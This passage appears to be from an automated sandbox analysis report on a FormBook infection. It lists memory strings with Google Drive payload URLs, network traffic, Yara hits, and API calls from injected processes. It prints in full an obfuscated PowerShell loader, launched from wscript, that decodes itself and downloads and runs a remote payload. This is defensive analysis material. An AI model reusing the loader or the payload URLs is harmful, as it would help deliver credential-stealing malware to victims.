              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvA
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAw
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0b
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bW
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8i
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ie
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ier
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9M
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MR
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRh
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhg
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgqP
              Source: powershell.exe, 0000000C.00000002.1816297065.0000000004E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgqXR
              Source: dxdiag.exe, 00000019.00000002.2166177608.0000000007EC2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2180633361.0000000022F50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER
              Source: dxdiag.exe, 00000019.00000002.2166177608.0000000007EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/yX
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FF8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417163022.0000022390098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq&export=download
              Source: dxdiag.exe, 00000019.00000003.1985875778.0000000007F22000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER&export=download
              Source: dxdiag.exe, 00000019.00000003.1985875778.0000000007F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER&export=downloade
              Source: dxdiag.exe, 00000019.00000003.1985875778.0000000007F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER&export=downloadom
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FF8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com6
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE9A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE9A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE9A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE9A43000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1205804911.000001FDE9A88000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1205804911.000001FDE9AA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1205804911.000001FDE9A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE9A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE9A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE9A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FF8A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FF8A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FF8A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FF8A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FF8A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:49733 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0000001E.00000002.2467721124.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2463661384.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2467865080.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.2467491077.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.2469446564.00000000055D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2181502037.0000000023810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2182064496.00000000265D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7436.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_4344.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4344, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens '
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Jump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF35C0 NtCreateMutant,LdrInitializeThunk,25_2_23AF35C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF2DF0 NtQuerySystemInformation,LdrInitializeThunk,25_2_23AF2DF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF2C70 NtFreeVirtualMemory,LdrInitializeThunk,25_2_23AF2C70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF4340 NtSetContextThread,25_2_23AF4340
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF3090 NtSetValueKey,25_2_23AF3090
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF3010 NtOpenDirectoryObject,25_2_23AF3010
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E4340 NtSetContextThread,LdrInitializeThunk,30_2_031E4340
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E4650 NtSuspendThread,LdrInitializeThunk,30_2_031E4650
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E35C0 NtCreateMutant,LdrInitializeThunk,30_2_031E35C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2B60 NtClose,LdrInitializeThunk,30_2_031E2B60
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2AD0 NtReadFile,LdrInitializeThunk,30_2_031E2AD0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2AF0 NtWriteFile,LdrInitializeThunk,30_2_031E2AF0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E39B0 NtGetContextThread,LdrInitializeThunk,30_2_031E39B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2F30 NtCreateSection,LdrInitializeThunk,30_2_031E2F30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2FB0 NtResumeThread,LdrInitializeThunk,30_2_031E2FB0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2FE0 NtCreateFile,LdrInitializeThunk,30_2_031E2FE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2EE0 NtQueueApcThread,LdrInitializeThunk,30_2_031E2EE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2D10 NtMapViewOfSection,LdrInitializeThunk,30_2_031E2D10
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2D30 NtUnmapViewOfSection,LdrInitializeThunk,30_2_031E2D30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2DD0 NtDelayExecution,LdrInitializeThunk,30_2_031E2DD0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2DF0 NtQuerySystemInformation,LdrInitializeThunk,30_2_031E2DF0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2C70 NtFreeVirtualMemory,LdrInitializeThunk,30_2_031E2C70
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2C60 NtCreateKey,LdrInitializeThunk,30_2_031E2C60
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2CA0 NtQueryInformationToken,LdrInitializeThunk,30_2_031E2CA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E3010 NtOpenDirectoryObject,30_2_031E3010
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E3090 NtSetValueKey,30_2_031E3090
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2B80 NtQueryInformationFile,30_2_031E2B80
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2BA0 NtEnumerateValueKey,30_2_031E2BA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2BF0 NtAllocateVirtualMemory,30_2_031E2BF0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2BE0 NtQueryValueKey,30_2_031E2BE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2AB0 NtWaitForSingleObject,30_2_031E2AB0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2F60 NtCreateProcessEx,30_2_031E2F60
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2F90 NtProtectVirtualMemory,30_2_031E2F90
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2FA0 NtQuerySection,30_2_031E2FA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2E30 NtWriteVirtualMemory,30_2_031E2E30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2E80 NtReadVirtualMemory,30_2_031E2E80
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2EA0 NtAdjustPrivilegesToken,30_2_031E2EA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E3D10 NtOpenProcessToken,30_2_031E3D10
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2D00 NtSetInformationFile,30_2_031E2D00
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E3D70 NtOpenThread,30_2_031E3D70
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2DB0 NtEnumerateKey,30_2_031E2DB0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2C00 NtQueryInformationProcess,30_2_031E2C00
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2CC0 NtQueryVirtualMemory,30_2_031E2CC0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E2CF0 NtOpenProcess,30_2_031E2CF0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_008793C0 NtCreateFile,30_2_008793C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00879530 NtReadFile,30_2_00879530
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_008796C0 NtClose,30_2_008796C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00879620 NtDeleteFile,30_2_00879620
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3D92CD023_2_00007FFC3D92CD02
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3D92BF563_2_00007FFC3D92BF56
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04C0E6A812_2_04C0E6A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04C0EF7812_2_04C0EF78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04C0E36012_2_04C0E360
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B0739A25_2_23B0739A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACE3F025_2_23ACE3F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B803E625_2_23B803E6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7132D25_2_23B7132D
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7A35225_2_23B7A352
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAD34C25_2_23AAD34C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC52A025_2_23AC52A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB2C025_2_23ADB2C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6027425_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B801AA25_2_23B801AA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACB1B025_2_23ACB1B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B781CC25_2_23B781CC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB010025_2_23AB0100
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B5A11825_2_23B5A118
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF516C25_2_23AF516C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B8B16B25_2_23B8B16B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF17225_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7F0E025_2_23B7F0E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B770E925_2_23B770E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C025_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6F0CC25_2_23B6F0CC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7F7B025_2_23B7F7B0
